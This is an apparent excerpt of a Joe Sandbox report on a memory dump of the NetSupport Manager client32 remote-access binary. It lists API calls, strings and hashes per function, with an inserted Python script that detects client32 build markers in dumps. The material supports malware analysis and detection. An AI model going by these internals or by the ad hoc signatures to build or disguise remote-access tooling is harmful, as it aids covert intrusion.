                                                                                • Instruction Fuzzy Hash: 4331F431A01166DBE711CFA5CDC0FAAF3B8FB44719F400678E961DB688DB71A944CB91
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeStringUninitializeW@16
                                                                                • String ID: HID$PS/2$USB$Win32_PointingDevice
                                                                                • API String ID: 1826621714-1320232752
                                                                                • Opcode ID: 9d2e9c34f5b1b97c684259860103f4124c37c48c5ab43a403e993a8275961f5c
                                                                                • Instruction ID: d5a300e082a68ff88eaf99d811029957e717e47c388a0f511f099868f117258d
                                                                                • Opcode Fuzzy Hash: 9d2e9c34f5b1b97c684259860103f4124c37c48c5ab43a403e993a8275961f5c
                                                                                • Instruction Fuzzy Hash: CE312F75A0061BDBDB24DF54CD84BEAB7B8FF48305F0044E5EA09AB244EB75EA84CB50
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
                                                                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F166A
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                • API String ID: 1318148156-3179819359
                                                                                • Opcode ID: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                • Instruction ID: 97078bb132b3f47e4dd387b208782a62a76e0766a2a430eba886c9c4ac9a83c1
                                                                                • Opcode Fuzzy Hash: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                • Instruction Fuzzy Hash: 1A318130A44725AFD320DF64C891BD6B7F4BB1D708F008568E2A99B6C5D7B1B588CF94
                                                                                APIs
                                                                                • _memmove.LIBCMT ref: 11081859
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                                • API String ID: 1528188558-3417006389
                                                                                • Opcode ID: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                • Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
                                                                                • Opcode Fuzzy Hash: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                • Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2
                                                                                APIs
                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
                                                                                • SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
                                                                                • DestroyCursor.USER32(00000000), ref: 1103F7A1
                                                                                • SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
                                                                                • UpdateWindow.USER32(00000000), ref: 1103F7F2
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                Strings
                                                                                • m_hWnd, xrefs: 1103F7E1
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 3726914545-2830328467
                                                                                • Opcode ID: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                • Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
                                                                                • Opcode Fuzzy Hash: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                • Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756
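The function records above leak several build-time strings that survive in memory and are far more specific to the NetSupport Manager client32 binary than the generic Win32 API calls around them: the `e:\nsmsrc\nsm\...\ctl32\wndclass.h` assert path, the `..\CTL32\DataStream.cpp` assert path, the `Client possibly unresponsive for %d ms (tid=%d)` watchdog message from `ResponseChk`, and the `nsmvxd.386` / `pcdvxd.386` device names opened through `CreateFileA("\\.\...")`. A responder who has only a memory dump, and not the sandbox verdict, can confirm the dump is client32 by hunting for those markers together. The script below is an added example, not part of the Joe Sandbox report and not NetSupport's code; the marker labels, the "two distinct families" threshold and the sample buffers are my own constructions, and the sample is a synthetic stand-in for a dump, not a real one.

```python
"""Hunt NetSupport client32 build/debug markers in a memory dump or PE image.

Added example, not from the Joe Sandbox report. Marker strings are copied
from the function listings (assert paths, watchdog text, VxD device names);
labels, threshold and sample buffers are constructed for illustration.
"""
import re
import sys
from typing import Dict, List, Tuple

# Each label maps to a regex over raw bytes. Backslashes are doubled for the
# regex engine, so rb"e:\\nsmsrc" matches the literal text e:\nsmsrc.
MARKERS: Dict[str, bytes] = {
    "nsm_build_path":   rb"e:\\nsmsrc\\nsm\\[0-9a-z\\]+\.h",          # assert() path baked into ctl32
    "ctl32_datastream": rb"\.\.\\CTL32\\DataStream\.cpp",             # assert() path in DataStream code
    "ui_watchdog":      rb"Client possibly unresponsive for %d ms \(tid=%d\)",
    "vxd_device":       rb"(?:nsm|pcd)vxd\.386",                       # opened as \\.\nsmvxd.386 / \\.\pcdvxd.386
    "wmi_pointing_dev": rb"Win32_PointingDevice",                      # generic WMI class, weak on its own
}

# Constructed threshold: require two distinct marker families before calling it
# client32, so a lone generic string such as Win32_PointingDevice is not enough.
THRESHOLD = 2


def scan_bytes(data: bytes) -> List[Tuple[str, int, bytes]]:
    """Return (label, offset, matched_bytes) for every marker hit, ordered by offset."""
    hits: List[Tuple[str, int, bytes]] = []
    for label, pattern in MARKERS.items():
        for m in re.finditer(pattern, data):
            hits.append((label, m.start(), m.group(0)))
    return sorted(hits, key=lambda h: h[1])


def classify(hits: List[Tuple[str, int, bytes]]) -> str:
    """Collapse hits into a verdict based on how many distinct families matched."""
    families = {label for label, _, _ in hits}
    if len(families) >= THRESHOLD:
        return "netsupport_client32"
    if families:
        return "weak"
    return "none"


def scan_file(path: str) -> str:
    """Classify an on-disk dump (.sdmp) or PE image by its marker strings."""
    with open(path, "rb") as fh:
        return classify(scan_bytes(fh.read()))


# Constructed sample buffers standing in for a dump of client32 (positive) and
# for an unrelated process that happens to query WMI pointing devices (negative).
SAMPLE_POSITIVE = (
    b"\x00" * 16
    + b"e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\wndclass.h\x00m_hWnd\x00"
    + b"\x90" * 8
    + b"Client possibly unresponsive for %d ms (tid=%d)Callstack:\x00"
    + b"\\\\.\\\x00nsmvxd.386\x00pcdvxd.386\x00"
    + b"ResponseChk\x00UI.CPP\x00"
)
SAMPLE_NEGATIVE = b"\x00" * 8 + b"Win32_PointingDevice\x00HID\x00PS/2\x00USB\x00"


if __name__ == "__main__":
    # Usage: python hunt_client32.py <dump-or-pe> [...]; with no arguments,
    # runs against the constructed samples.
    targets = sys.argv[1:]
    if not targets:
        for name, buf in (("positive", SAMPLE_POSITIVE), ("negative", SAMPLE_NEGATIVE)):
            for label, off, raw in scan_bytes(buf):
                print(f"{name}: {label} @0x{off:x} {raw!r}")
            print(f"{name}: verdict={classify(scan_bytes(buf))}")
    for path in targets:
        print(f"{path}: verdict={scan_file(path)}")
```

The threshold is the point of the exercise: `Win32_PointingDevice`, `HID`, `PS/2` and `USB` appear in any code that enumerates mice through WMI, so on their own they only earn a "weak" result, whereas the `nsmsrc` assert path and the `ResponseChk` watchdog text have no reason to exist outside a NetSupport build. Offsets are reported so a hit can be cross-referenced against the `xrefs` addresses in the listing once the dump's load base (11000000 here) is subtracted.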
                                                                                APIs
                                                                                • GetMenuItemCount.USER32(?), ref: 1115F62F
                                                                                • _memset.LIBCMT ref: 1115F64B
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 1115F65C
                                                                                  • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                  • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                • CheckMenuItem.USER32(?,00000000,00000000), ref: 1115F698
                                                                                • EnableMenuItem.USER32(?,00000000,00000000), ref: 1115F6AE
                                                                                • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1115F6C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
                                                                                • String ID: 0
                                                                                • API String ID: 176136580-4108050209
                                                                                • Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                • Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
                                                                                • Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                • Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772
                                                                                APIs
                                                                                • _memmove.LIBCMT ref: 1108132F
                                                                                • _memset.LIBCMT ref: 11081318
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                                • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                                • API String ID: 75970324-4264523126
                                                                                • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                                • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                                • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 1103F466
                                                                                • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                • IsWindow.USER32(00000000), ref: 1103F484
                                                                                • Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                • IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Find$Sleep
                                                                                • String ID: PCIVideoSlave32
                                                                                • API String ID: 2137649973-2496367574
                                                                                • Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                • Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
                                                                                • Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                                • Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
                                                                                APIs
                                                                                • LoadMenuA.USER32(00000000,00002EFF), ref: 1100340E
                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 1100343A
                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 1100345C
                                                                                • DestroyMenu.USER32(00000000), ref: 1100346A
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                • API String ID: 468487828-934300333
                                                                                • Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                                • Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                                • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                                APIs
                                                                                • LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                                • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                • API String ID: 4241058051-934300333
                                                                                • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                                • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                                APIs
                                                                                • GetWindowTextA.USER32(?,?,00000050), ref: 11025766
                                                                                • _strncat.LIBCMT ref: 1102577B
                                                                                • SetWindowTextA.USER32(?,?), ref: 11025788
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025814
                                                                                • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025828
                                                                                • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
                                                                                • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
                                                                                • SetFocus.USER32(?), ref: 11025855
                                                                                  • Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                • String ID:
                                                                                • API String ID: 3832070631-0
                                                                                • Opcode ID: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                                • Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
                                                                                • Opcode Fuzzy Hash: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                                • Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54
                                                                                APIs
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
                                                                                • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111323D6,00000000,?), ref: 110EF7BD
                                                                                • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
                                                                                • GlobalLock.KERNEL32(00000000), ref: 110EF7EC
                                                                                • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 110EF825
                                                                                • GlobalFree.KERNEL32(00000000), ref: 110EF82C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                • String ID:
                                                                                • API String ID: 3489003387-0
                                                                                • Opcode ID: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                • Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
                                                                                • Opcode Fuzzy Hash: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                                • Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2
                                                                                APIs
                                                                                • GetMenuItemCount.USER32(?), ref: 1114382B
                                                                                • GetSubMenu.USER32(?,00000000), ref: 11143848
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 11143869
                                                                                • GetMenuItemID.USER32(?,00000001), ref: 11143872
                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 1114387C
                                                                                • DeleteMenu.USER32(?,00000001,00000400), ref: 11143892
                                                                                • GetMenuItemID.USER32(?,00000001), ref: 1114389A
                                                                                • DeleteMenu.USER32(?,-00000001,00000400), ref: 111438B1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
